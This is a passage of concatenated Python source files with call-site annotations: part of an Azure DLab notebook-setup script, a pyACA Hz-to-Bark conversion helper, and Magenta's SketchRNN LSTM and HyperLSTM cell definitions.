{0}'.format(err)) sys.exit(1) notebook_config['spark_master_url'] = 'spark://{}:7077'.format(notebook_config['spark_master_ip']) except Exception as err: for i in range(notebook_config['instance_count'] - 1): slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1) AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name) AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name']) append_result("Failed to generate infrastructure names", str(err)) sys.exit(1) try: logging.info('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]') print('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]') params = "--cluster_name {0} --spark_version {1} --hadoop_version {2} --os_user {3} --spark_master {4}" \ " --keyfile {5} --notebook_ip {6} --datalake_enabled {7} --spark_master_ip {8}".\ format(notebook_config['cluster_name'], os.environ['notebook_spark_version'], os.environ['notebook_hadoop_version'], notebook_config['dlab_ssh_user'], notebook_config['spark_master_url'], notebook_config['key_path'], notebook_config['notebook_ip'], os.environ['azure_datalake_enable'], notebook_config['spark_master_ip']) try: local("~/scripts/{}_{}.py {}".format(os.environ['application'], 'install_dataengine_kernels', params)) except: traceback.print_exc() raise Exception except Exception as err: print('Error: {0}'.format(err)) for i in range(notebook_config['instance_count'] - 1): slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1) AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name) AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name']) append_result("Failed installing Dataengine kernels.", str(err)) sys.exit(1) try: logging.info('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]') print('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]') params = "--hostname {0} " \ "--keyfile {1} " \ "--os_user {2} " \ "--cluster_name {3} " \ .format(notebook_config['notebook_ip'], notebook_config['key_path'], notebook_config['dlab_ssh_user'], notebook_config['cluster_name']) try: local("~/scripts/{0}.py {1}".format('common_configure_spark', params)) except: traceback.print_exc() raise Exception except Exception as err: print('Error: {0}'.format(err)) for i in range(notebook_config['instance_count'] - 1): slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1) AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name) AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name']) append_result("Failed to configure Spark.", str(err)) sys.exit(1) try: with open("/root/result.json", 'w') as result: res = {"notebook_name": notebook_config['notebook_name'], "Action": "Configure notebook server"} print(json.dumps(res)) result.write(json.dumps(res)) except: print("Failed writing results.") sys.exit(0)
[((38, 4, 40, 52), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((89, 8, 89, 68), 'logging.info', 'logging.info', ({(89, 21, 89, 67): '"""[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]"""'}, {}), "('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]')", False, 'import logging\n'), ((112, 8, 112, 72), 'logging.info', 'logging.info', ({(112, 21, 112, 71): '"""[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]"""'}, {}), "('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]')", False, 'import logging\n'), ((86, 8, 86, 19), 'sys.exit', 'sys.exit', ({(86, 17, 86, 18): '(1)'}, {}), '(1)', False, 'import sys\n'), ((109, 8, 109, 19), 'sys.exit', 'sys.exit', ({(109, 17, 109, 18): '(1)'}, {}), '(1)', False, 'import sys\n'), ((134, 8, 134, 19), 'sys.exit', 'sys.exit', ({(134, 17, 134, 18): '(1)'}, {}), '(1)', False, 'import sys\n'), ((144, 8, 144, 19), 'sys.exit', 'sys.exit', ({(144, 17, 144, 18): '(0)'}, {}), '(0)', False, 'import sys\n'), ((77, 12, 77, 23), 'sys.exit', 'sys.exit', ({(77, 21, 77, 22): '(1)'}, {}), '(1)', False, 'import sys\n'), ((140, 18, 140, 33), 'json.dumps', 'json.dumps', ({(140, 29, 140, 32): 'res'}, {}), '(res)', False, 'import json\n'), ((141, 25, 141, 40), 'json.dumps', 'json.dumps', ({(141, 36, 141, 39): 'res'}, {}), '(res)', False, 'import json\n')]
ruohoruotsi/pyACA
pyACA/ToolFreq2Bark.py
339e9395b65a217aa5965638af941b32d5c95454
# -*- coding: utf-8 -*- """ helper function: convert Hz to Bark scale Args: fInHz: The frequency to be converted, can be scalar or vector cModel: The name of the model ('Schroeder' [default], 'Terhardt', 'Zwicker', 'Traunmuller') Returns: Bark values of the input dimension """ import numpy as np import math def ToolFreq2Bark(fInHz, cModel = 'Schroeder'): def acaSchroeder_scalar(f): return 7 * math.asinh(f/650) def acaTerhardt_scalar(f): return 13.3 * math.atan(0.75 * f/1000) def acaZwicker_scalar(f): return 13 * math.atan(0.76 * f/1000) + 3.5 * math.atan(f/7500) def acaTraunmuller_scalar(f): return 26.81/(1+1960./f) - 0.53 f = np.asarray(fInHz) if f.ndim == 0: if cModel == 'Terhardt': return acaTerhardt_scalar(f) elif cModel == 'Zwicker': return acaZwicker_scalar(f) elif cModel == 'Traunmuller': return acaTraunmuller_scalar(f) else: return acaSchroeder_scalar(f) fBark = np.zeros(f.shape) if cModel == 'Terhardt': for k,fi in enumerate(f): fBark[k] = acaTerhardt_scalar(fi) elif cModel == 'Zwicker': for k,fi in enumerate(f): fBark[k] = acaZwicker_scalar(fi) elif cModel == 'Traunmuller': for k,fi in enumerate(f): fBark[k] = acaTraunmuller_scalar(fi) else: for k,fi in enumerate(f): fBark[k] = acaSchroeder_scalar(fi) return (fBark)
[((27, 8, 27, 25), 'numpy.asarray', 'np.asarray', ({(27, 19, 27, 24): 'fInHz'}, {}), '(fInHz)', True, 'import numpy as np\n'), ((38, 12, 38, 29), 'numpy.zeros', 'np.zeros', ({(38, 21, 38, 28): 'f.shape'}, {}), '(f.shape)', True, 'import numpy as np\n'), ((19, 19, 19, 36), 'math.asinh', 'math.asinh', ({(19, 30, 19, 35): '(f / 650)'}, {}), '(f / 650)', False, 'import math\n'), ((21, 22, 21, 46), 'math.atan', 'math.atan', ({(21, 32, 21, 45): '(0.75 * f / 1000)'}, {}), '(0.75 * f / 1000)', False, 'import math\n'), ((23, 20, 23, 44), 'math.atan', 'math.atan', ({(23, 30, 23, 43): '(0.76 * f / 1000)'}, {}), '(0.76 * f / 1000)', False, 'import math\n'), ((23, 53, 23, 70), 'math.atan', 'math.atan', ({(23, 63, 23, 69): '(f / 7500)'}, {}), '(f / 7500)', False, 'import math\n')]
laurens-in/magenta
magenta/models/sketch_rnn/rnn.py
be6ed8d5b1eb2986ca277aa9c574a7912dd5ed0f
# Copyright 2019 The Magenta Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """SketchRNN RNN definition.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np import tensorflow.compat.v1 as tf from tensorflow.contrib import rnn as contrib_rnn def orthogonal(shape): """Orthogonal initilaizer.""" flat_shape = (shape[0], np.prod(shape[1:])) a = np.random.normal(0.0, 1.0, flat_shape) u, _, v = np.linalg.svd(a, full_matrices=False) q = u if u.shape == flat_shape else v return q.reshape(shape) def orthogonal_initializer(scale=1.0): """Orthogonal initializer.""" def _initializer(shape, dtype=tf.float32, partition_info=None): # pylint: disable=unused-argument return tf.constant(orthogonal(shape) * scale, dtype) return _initializer def lstm_ortho_initializer(scale=1.0): """LSTM orthogonal initializer.""" def _initializer(shape, dtype=tf.float32, partition_info=None): # pylint: disable=unused-argument size_x = shape[0] size_h = shape[1] // 4 # assumes lstm. t = np.zeros(shape) t[:, :size_h] = orthogonal([size_x, size_h]) * scale t[:, size_h:size_h * 2] = orthogonal([size_x, size_h]) * scale t[:, size_h * 2:size_h * 3] = orthogonal([size_x, size_h]) * scale t[:, size_h * 3:] = orthogonal([size_x, size_h]) * scale return tf.constant(t, dtype) return _initializer class LSTMCell(contrib_rnn.RNNCell): """Vanilla LSTM cell. Uses ortho initializer, and also recurrent dropout without memory loss (https://arxiv.org/abs/1603.05118) """ def __init__(self, num_units, forget_bias=1.0, use_recurrent_dropout=False, dropout_keep_prob=0.9): self.num_units = num_units self.forget_bias = forget_bias self.use_recurrent_dropout = use_recurrent_dropout self.dropout_keep_prob = dropout_keep_prob @property def state_size(self): return 2 * self.num_units @property def output_size(self): return self.num_units def get_output(self, state): unused_c, h = tf.split(state, 2, 1) return h def __call__(self, x, state, scope=None): with tf.variable_scope(scope or type(self).__name__): c, h = tf.split(state, 2, 1) x_size = x.get_shape().as_list()[1] w_init = None # uniform h_init = lstm_ortho_initializer(1.0) # Keep W_xh and W_hh separate here as well to use different init methods. w_xh = tf.get_variable( 'W_xh', [x_size, 4 * self.num_units], initializer=w_init) w_hh = tf.get_variable( 'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init) bias = tf.get_variable( 'bias', [4 * self.num_units], initializer=tf.constant_initializer(0.0)) concat = tf.concat([x, h], 1) w_full = tf.concat([w_xh, w_hh], 0) hidden = tf.matmul(concat, w_full) + bias i, j, f, o = tf.split(hidden, 4, 1) if self.use_recurrent_dropout: g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob) else: g = tf.tanh(j) new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g new_h = tf.tanh(new_c) * tf.sigmoid(o) return new_h, tf.concat([new_c, new_h], 1) # fuk tuples. def layer_norm_all(h, batch_size, base, num_units, scope='layer_norm', reuse=False, gamma_start=1.0, epsilon=1e-3, use_bias=True): """Layer Norm (faster version, but not using defun).""" # Performs layer norm on multiple base at once (ie, i, g, j, o for lstm) # Reshapes h in to perform layer norm in parallel h_reshape = tf.reshape(h, [batch_size, base, num_units]) mean = tf.reduce_mean(h_reshape, [2], keep_dims=True) var = tf.reduce_mean(tf.square(h_reshape - mean), [2], keep_dims=True) epsilon = tf.constant(epsilon) rstd = tf.rsqrt(var + epsilon) h_reshape = (h_reshape - mean) * rstd # reshape back to original h = tf.reshape(h_reshape, [batch_size, base * num_units]) with tf.variable_scope(scope): if reuse: tf.get_variable_scope().reuse_variables() gamma = tf.get_variable( 'ln_gamma', [4 * num_units], initializer=tf.constant_initializer(gamma_start)) if use_bias: beta = tf.get_variable( 'ln_beta', [4 * num_units], initializer=tf.constant_initializer(0.0)) if use_bias: return gamma * h + beta return gamma * h def layer_norm(x, num_units, scope='layer_norm', reuse=False, gamma_start=1.0, epsilon=1e-3, use_bias=True): """Calculate layer norm.""" axes = [1] mean = tf.reduce_mean(x, axes, keep_dims=True) x_shifted = x - mean var = tf.reduce_mean(tf.square(x_shifted), axes, keep_dims=True) inv_std = tf.rsqrt(var + epsilon) with tf.variable_scope(scope): if reuse: tf.get_variable_scope().reuse_variables() gamma = tf.get_variable( 'ln_gamma', [num_units], initializer=tf.constant_initializer(gamma_start)) if use_bias: beta = tf.get_variable( 'ln_beta', [num_units], initializer=tf.constant_initializer(0.0)) output = gamma * (x_shifted) * inv_std if use_bias: output += beta return output def raw_layer_norm(x, epsilon=1e-3): axes = [1] mean = tf.reduce_mean(x, axes, keep_dims=True) std = tf.sqrt( tf.reduce_mean(tf.square(x - mean), axes, keep_dims=True) + epsilon) output = (x - mean) / (std) return output def super_linear(x, output_size, scope=None, reuse=False, init_w='ortho', weight_start=0.0, use_bias=True, bias_start=0.0, input_size=None): """Performs linear operation. Uses ortho init defined earlier.""" shape = x.get_shape().as_list() with tf.variable_scope(scope or 'linear'): if reuse: tf.get_variable_scope().reuse_variables() w_init = None # uniform if input_size is None: x_size = shape[1] else: x_size = input_size if init_w == 'zeros': w_init = tf.constant_initializer(0.0) elif init_w == 'constant': w_init = tf.constant_initializer(weight_start) elif init_w == 'gaussian': w_init = tf.random_normal_initializer(stddev=weight_start) elif init_w == 'ortho': w_init = lstm_ortho_initializer(1.0) w = tf.get_variable( 'super_linear_w', [x_size, output_size], tf.float32, initializer=w_init) if use_bias: b = tf.get_variable( 'super_linear_b', [output_size], tf.float32, initializer=tf.constant_initializer(bias_start)) return tf.matmul(x, w) + b return tf.matmul(x, w) class LayerNormLSTMCell(contrib_rnn.RNNCell): """Layer-Norm, with Ortho Init. and Recurrent Dropout without Memory Loss. https://arxiv.org/abs/1607.06450 - Layer Norm https://arxiv.org/abs/1603.05118 - Recurrent Dropout without Memory Loss """ def __init__(self, num_units, forget_bias=1.0, use_recurrent_dropout=False, dropout_keep_prob=0.90): """Initialize the Layer Norm LSTM cell. Args: num_units: int, The number of units in the LSTM cell. forget_bias: float, The bias added to forget gates (default 1.0). use_recurrent_dropout: Whether to use Recurrent Dropout (default False) dropout_keep_prob: float, dropout keep probability (default 0.90) """ self.num_units = num_units self.forget_bias = forget_bias self.use_recurrent_dropout = use_recurrent_dropout self.dropout_keep_prob = dropout_keep_prob @property def input_size(self): return self.num_units @property def output_size(self): return self.num_units @property def state_size(self): return 2 * self.num_units def get_output(self, state): h, unused_c = tf.split(state, 2, 1) return h def __call__(self, x, state, timestep=0, scope=None): with tf.variable_scope(scope or type(self).__name__): h, c = tf.split(state, 2, 1) h_size = self.num_units x_size = x.get_shape().as_list()[1] batch_size = x.get_shape().as_list()[0] w_init = None # uniform h_init = lstm_ortho_initializer(1.0) w_xh = tf.get_variable( 'W_xh', [x_size, 4 * self.num_units], initializer=w_init) w_hh = tf.get_variable( 'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init) concat = tf.concat([x, h], 1) # concat for speed. w_full = tf.concat([w_xh, w_hh], 0) concat = tf.matmul(concat, w_full) #+ bias # live life without garbage. # i = input_gate, j = new_input, f = forget_gate, o = output_gate concat = layer_norm_all(concat, batch_size, 4, h_size, 'ln_all') i, j, f, o = tf.split(concat, 4, 1) if self.use_recurrent_dropout: g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob) else: g = tf.tanh(j) new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g new_h = tf.tanh(layer_norm(new_c, h_size, 'ln_c')) * tf.sigmoid(o) return new_h, tf.concat([new_h, new_c], 1) class HyperLSTMCell(contrib_rnn.RNNCell): """HyperLSTM with Ortho Init, Layer Norm, Recurrent Dropout, no Memory Loss. https://arxiv.org/abs/1609.09106 http://blog.otoro.net/2016/09/28/hyper-networks/ """ def __init__(self, num_units, forget_bias=1.0, use_recurrent_dropout=False, dropout_keep_prob=0.90, use_layer_norm=True, hyper_num_units=256, hyper_embedding_size=32, hyper_use_recurrent_dropout=False): """Initialize the Layer Norm HyperLSTM cell. Args: num_units: int, The number of units in the LSTM cell. forget_bias: float, The bias added to forget gates (default 1.0). use_recurrent_dropout: Whether to use Recurrent Dropout (default False) dropout_keep_prob: float, dropout keep probability (default 0.90) use_layer_norm: boolean. (default True) Controls whether we use LayerNorm layers in main LSTM & HyperLSTM cell. hyper_num_units: int, number of units in HyperLSTM cell. (default is 128, recommend experimenting with 256 for larger tasks) hyper_embedding_size: int, size of signals emitted from HyperLSTM cell. (default is 16, recommend trying larger values for large datasets) hyper_use_recurrent_dropout: boolean. (default False) Controls whether HyperLSTM cell also uses recurrent dropout. Recommend turning this on only if hyper_num_units becomes large (>= 512) """ self.num_units = num_units self.forget_bias = forget_bias self.use_recurrent_dropout = use_recurrent_dropout self.dropout_keep_prob = dropout_keep_prob self.use_layer_norm = use_layer_norm self.hyper_num_units = hyper_num_units self.hyper_embedding_size = hyper_embedding_size self.hyper_use_recurrent_dropout = hyper_use_recurrent_dropout self.total_num_units = self.num_units + self.hyper_num_units if self.use_layer_norm: cell_fn = LayerNormLSTMCell else: cell_fn = LSTMCell self.hyper_cell = cell_fn( hyper_num_units, use_recurrent_dropout=hyper_use_recurrent_dropout, dropout_keep_prob=dropout_keep_prob) @property def input_size(self): return self._input_size @property def output_size(self): return self.num_units @property def state_size(self): return 2 * self.total_num_units def get_output(self, state): total_h, unused_total_c = tf.split(state, 2, 1) h = total_h[:, 0:self.num_units] return h def hyper_norm(self, layer, scope='hyper', use_bias=True): num_units = self.num_units embedding_size = self.hyper_embedding_size # recurrent batch norm init trick (https://arxiv.org/abs/1603.09025). init_gamma = 0.10 # cooijmans' da man. with tf.variable_scope(scope): zw = super_linear( self.hyper_output, embedding_size, init_w='constant', weight_start=0.00, use_bias=True, bias_start=1.0, scope='zw') alpha = super_linear( zw, num_units, init_w='constant', weight_start=init_gamma / embedding_size, use_bias=False, scope='alpha') result = tf.multiply(alpha, layer) if use_bias: zb = super_linear( self.hyper_output, embedding_size, init_w='gaussian', weight_start=0.01, use_bias=False, bias_start=0.0, scope='zb') beta = super_linear( zb, num_units, init_w='constant', weight_start=0.00, use_bias=False, scope='beta') result += beta return result def __call__(self, x, state, timestep=0, scope=None): with tf.variable_scope(scope or type(self).__name__): total_h, total_c = tf.split(state, 2, 1) h = total_h[:, 0:self.num_units] c = total_c[:, 0:self.num_units] self.hyper_state = tf.concat( [total_h[:, self.num_units:], total_c[:, self.num_units:]], 1) batch_size = x.get_shape().as_list()[0] x_size = x.get_shape().as_list()[1] self._input_size = x_size w_init = None # uniform h_init = lstm_ortho_initializer(1.0) w_xh = tf.get_variable( 'W_xh', [x_size, 4 * self.num_units], initializer=w_init) w_hh = tf.get_variable( 'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init) bias = tf.get_variable( 'bias', [4 * self.num_units], initializer=tf.constant_initializer(0.0)) # concatenate the input and hidden states for hyperlstm input hyper_input = tf.concat([x, h], 1) hyper_output, hyper_new_state = self.hyper_cell(hyper_input, self.hyper_state) self.hyper_output = hyper_output self.hyper_state = hyper_new_state xh = tf.matmul(x, w_xh) hh = tf.matmul(h, w_hh) # split Wxh contributions ix, jx, fx, ox = tf.split(xh, 4, 1) ix = self.hyper_norm(ix, 'hyper_ix', use_bias=False) jx = self.hyper_norm(jx, 'hyper_jx', use_bias=False) fx = self.hyper_norm(fx, 'hyper_fx', use_bias=False) ox = self.hyper_norm(ox, 'hyper_ox', use_bias=False) # split Whh contributions ih, jh, fh, oh = tf.split(hh, 4, 1) ih = self.hyper_norm(ih, 'hyper_ih', use_bias=True) jh = self.hyper_norm(jh, 'hyper_jh', use_bias=True) fh = self.hyper_norm(fh, 'hyper_fh', use_bias=True) oh = self.hyper_norm(oh, 'hyper_oh', use_bias=True) # split bias ib, jb, fb, ob = tf.split(bias, 4, 0) # bias is to be broadcasted. # i = input_gate, j = new_input, f = forget_gate, o = output_gate i = ix + ih + ib j = jx + jh + jb f = fx + fh + fb o = ox + oh + ob if self.use_layer_norm: concat = tf.concat([i, j, f, o], 1) concat = layer_norm_all(concat, batch_size, 4, self.num_units, 'ln_all') i, j, f, o = tf.split(concat, 4, 1) if self.use_recurrent_dropout: g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob) else: g = tf.tanh(j) new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g new_h = tf.tanh(layer_norm(new_c, self.num_units, 'ln_c')) * tf.sigmoid(o) hyper_h, hyper_c = tf.split(hyper_new_state, 2, 1) new_total_h = tf.concat([new_h, hyper_h], 1) new_total_c = tf.concat([new_c, hyper_c], 1) new_total_state = tf.concat([new_total_h, new_total_c], 1) return new_h, new_total_state
[((29, 6, 29, 44), 'numpy.random.normal', 'np.random.normal', ({(29, 23, 29, 26): '0.0', (29, 28, 29, 31): '1.0', (29, 33, 29, 43): 'flat_shape'}, {}), '(0.0, 1.0, flat_shape)', True, 'import numpy as np\n'), ((30, 12, 30, 49), 'numpy.linalg.svd', 'np.linalg.svd', (), '', True, 'import numpy as np\n'), ((137, 14, 137, 58), 'tensorflow.compat.v1.reshape', 'tf.reshape', ({(137, 25, 137, 26): 'h', (137, 28, 137, 57): '[batch_size, base, num_units]'}, {}), '(h, [batch_size, base, num_units])', True, 'import tensorflow.compat.v1 as tf\n'), ((138, 9, 138, 55), 'tensorflow.compat.v1.reduce_mean', 'tf.reduce_mean', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((140, 12, 140, 32), 'tensorflow.compat.v1.constant', 'tf.constant', ({(140, 24, 140, 31): 'epsilon'}, {}), '(epsilon)', True, 'import tensorflow.compat.v1 as tf\n'), ((141, 9, 141, 32), 'tensorflow.compat.v1.rsqrt', 'tf.rsqrt', ({(141, 18, 141, 31): 'var + epsilon'}, {}), '(var + epsilon)', True, 'import tensorflow.compat.v1 as tf\n'), ((144, 6, 144, 59), 'tensorflow.compat.v1.reshape', 'tf.reshape', ({(144, 17, 144, 26): 'h_reshape', (144, 28, 144, 58): '[batch_size, base * num_units]'}, {}), '(h_reshape, [batch_size, base * num_units])', True, 'import tensorflow.compat.v1 as tf\n'), ((168, 9, 168, 48), 'tensorflow.compat.v1.reduce_mean', 'tf.reduce_mean', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((171, 12, 171, 35), 'tensorflow.compat.v1.rsqrt', 'tf.rsqrt', ({(171, 21, 171, 34): 'var + epsilon'}, {}), '(var + epsilon)', True, 'import tensorflow.compat.v1 as tf\n'), ((189, 9, 189, 48), 'tensorflow.compat.v1.reduce_mean', 'tf.reduce_mean', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((28, 26, 28, 44), 'numpy.prod', 'np.prod', ({(28, 34, 28, 43): 'shape[1:]'}, {}), '(shape[1:])', True, 'import numpy as np\n'), ((50, 8, 50, 23), 'numpy.zeros', 'np.zeros', ({(50, 17, 50, 22): 'shape'}, {}), '(shape)', True, 'import numpy as np\n'), ((55, 11, 55, 32), 'tensorflow.compat.v1.constant', 'tf.constant', ({(55, 23, 55, 24): 't', (55, 26, 55, 31): 'dtype'}, {}), '(t, dtype)', True, 'import tensorflow.compat.v1 as tf\n'), ((86, 18, 86, 39), 'tensorflow.compat.v1.split', 'tf.split', ({(86, 27, 86, 32): 'state', (86, 34, 86, 35): '2', (86, 37, 86, 38): '1'}, {}), '(state, 2, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((139, 23, 139, 50), 'tensorflow.compat.v1.square', 'tf.square', ({(139, 33, 139, 49): 'h_reshape - mean'}, {}), '(h_reshape - mean)', True, 'import tensorflow.compat.v1 as tf\n'), ((145, 7, 145, 31), 'tensorflow.compat.v1.variable_scope', 'tf.variable_scope', ({(145, 25, 145, 30): 'scope'}, {}), '(scope)', True, 'import tensorflow.compat.v1 as tf\n'), ((170, 23, 170, 43), 'tensorflow.compat.v1.square', 'tf.square', ({(170, 33, 170, 42): 'x_shifted'}, {}), '(x_shifted)', True, 'import tensorflow.compat.v1 as tf\n'), ((172, 7, 172, 31), 'tensorflow.compat.v1.variable_scope', 'tf.variable_scope', ({(172, 25, 172, 30): 'scope'}, {}), '(scope)', True, 'import tensorflow.compat.v1 as tf\n'), ((207, 7, 207, 43), 'tensorflow.compat.v1.variable_scope', 'tf.variable_scope', ({(207, 25, 207, 42): "(scope or 'linear')"}, {}), "(scope or 'linear')", True, 'import tensorflow.compat.v1 as tf\n'), ((225, 8, 226, 80), 'tensorflow.compat.v1.get_variable', 'tf.get_variable', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((233, 11, 233, 26), 'tensorflow.compat.v1.matmul', 'tf.matmul', ({(233, 21, 233, 22): 'x', (233, 24, 233, 25): 'w'}, {}), '(x, w)', True, 'import tensorflow.compat.v1 as tf\n'), ((274, 18, 274, 39), 'tensorflow.compat.v1.split', 'tf.split', ({(274, 27, 274, 32): 'state', (274, 34, 274, 35): '2', (274, 37, 274, 38): '1'}, {}), '(state, 2, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((379, 30, 379, 51), 'tensorflow.compat.v1.split', 'tf.split', ({(379, 39, 379, 44): 'state', (379, 46, 379, 47): '2', (379, 49, 379, 50): '1'}, {}), '(state, 2, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((91, 13, 91, 34), 'tensorflow.compat.v1.split', 'tf.split', ({(91, 22, 91, 27): 'state', (91, 29, 91, 30): '2', (91, 32, 91, 33): '1'}, {}), '(state, 2, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((100, 13, 101, 67), 'tensorflow.compat.v1.get_variable', 'tf.get_variable', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((102, 13, 103, 75), 'tensorflow.compat.v1.get_variable', 'tf.get_variable', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((108, 15, 108, 35), 'tensorflow.compat.v1.concat', 'tf.concat', ({(108, 25, 108, 31): '[x, h]', (108, 33, 108, 34): '1'}, {}), '([x, h], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((109, 15, 109, 41), 'tensorflow.compat.v1.concat', 'tf.concat', ({(109, 25, 109, 37): '[w_xh, w_hh]', (109, 39, 109, 40): '0'}, {}), '([w_xh, w_hh], 0)', True, 'import tensorflow.compat.v1 as tf\n'), ((112, 19, 112, 41), 'tensorflow.compat.v1.split', 'tf.split', ({(112, 28, 112, 34): 'hidden', (112, 36, 112, 37): '4', (112, 39, 112, 40): '1'}, {}), '(hidden, 4, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((217, 15, 217, 43), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(217, 39, 217, 42): '0.0'}, {}), '(0.0)', True, 'import tensorflow.compat.v1 as tf\n'), ((279, 13, 279, 34), 'tensorflow.compat.v1.split', 'tf.split', ({(279, 22, 279, 27): 'state', (279, 29, 279, 30): '2', (279, 32, 279, 33): '1'}, {}), '(state, 2, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((289, 13, 290, 67), 'tensorflow.compat.v1.get_variable', 'tf.get_variable', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((291, 13, 292, 75), 'tensorflow.compat.v1.get_variable', 'tf.get_variable', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((294, 15, 294, 35), 'tensorflow.compat.v1.concat', 'tf.concat', ({(294, 25, 294, 31): '[x, h]', (294, 33, 294, 34): '1'}, {}), '([x, h], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((295, 15, 295, 41), 'tensorflow.compat.v1.concat', 'tf.concat', ({(295, 25, 295, 37): '[w_xh, w_hh]', (295, 39, 295, 40): '0'}, {}), '([w_xh, w_hh], 0)', True, 'import tensorflow.compat.v1 as tf\n'), ((296, 15, 296, 40), 'tensorflow.compat.v1.matmul', 'tf.matmul', ({(296, 25, 296, 31): 'concat', (296, 33, 296, 39): 'w_full'}, {}), '(concat, w_full)', True, 'import tensorflow.compat.v1 as tf\n'), ((300, 19, 300, 41), 'tensorflow.compat.v1.split', 'tf.split', ({(300, 28, 300, 34): 'concat', (300, 36, 300, 37): '4', (300, 39, 300, 40): '1'}, {}), '(concat, 4, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((310, 18, 310, 46), 'tensorflow.compat.v1.concat', 'tf.concat', ({(310, 28, 310, 42): '[new_h, new_c]', (310, 44, 310, 45): '(1)'}, {}), '([new_h, new_c], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((388, 9, 388, 33), 'tensorflow.compat.v1.variable_scope', 'tf.variable_scope', ({(388, 27, 388, 32): 'scope'}, {}), '(scope)', True, 'import tensorflow.compat.v1 as tf\n'), ((404, 15, 404, 40), 'tensorflow.compat.v1.multiply', 'tf.multiply', ({(404, 27, 404, 32): 'alpha', (404, 34, 404, 39): 'layer'}, {}), '(alpha, layer)', True, 'import tensorflow.compat.v1 as tf\n'), ((426, 25, 426, 46), 'tensorflow.compat.v1.split', 'tf.split', ({(426, 34, 426, 39): 'state', (426, 41, 426, 42): '2', (426, 44, 426, 45): '1'}, {}), '(state, 2, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((429, 25, 430, 72), 'tensorflow.compat.v1.concat', 'tf.concat', ({(430, 10, 430, 68): '[total_h[:, self.num_units:], total_c[:, self.num_units:]]', (430, 70, 430, 71): '1'}, {}), '([total_h[:, self.num_units:], total_c[:, self.num_units:]], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((440, 13, 441, 67), 'tensorflow.compat.v1.get_variable', 'tf.get_variable', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((442, 13, 443, 75), 'tensorflow.compat.v1.get_variable', 'tf.get_variable', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((449, 20, 449, 40), 'tensorflow.compat.v1.concat', 'tf.concat', ({(449, 30, 449, 36): '[x, h]', (449, 38, 449, 39): '1'}, {}), '([x, h], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((455, 11, 455, 29), 'tensorflow.compat.v1.matmul', 'tf.matmul', ({(455, 21, 455, 22): 'x', (455, 24, 455, 28): 'w_xh'}, {}), '(x, w_xh)', True, 'import tensorflow.compat.v1 as tf\n'), ((456, 11, 456, 29), 'tensorflow.compat.v1.matmul', 'tf.matmul', ({(456, 21, 456, 22): 'h', (456, 24, 456, 28): 'w_hh'}, {}), '(h, w_hh)', True, 'import tensorflow.compat.v1 as tf\n'), ((459, 23, 459, 41), 'tensorflow.compat.v1.split', 'tf.split', ({(459, 32, 459, 34): 'xh', (459, 36, 459, 37): '4', (459, 39, 459, 40): '1'}, {}), '(xh, 4, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((466, 23, 466, 41), 'tensorflow.compat.v1.split', 'tf.split', ({(466, 32, 466, 34): 'hh', (466, 36, 466, 37): '4', (466, 39, 466, 40): '1'}, {}), '(hh, 4, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((473, 23, 473, 43), 'tensorflow.compat.v1.split', 'tf.split', ({(473, 32, 473, 36): 'bias', (473, 38, 473, 39): '4', (473, 41, 473, 42): '0'}, {}), '(bias, 4, 0)', True, 'import tensorflow.compat.v1 as tf\n'), ((494, 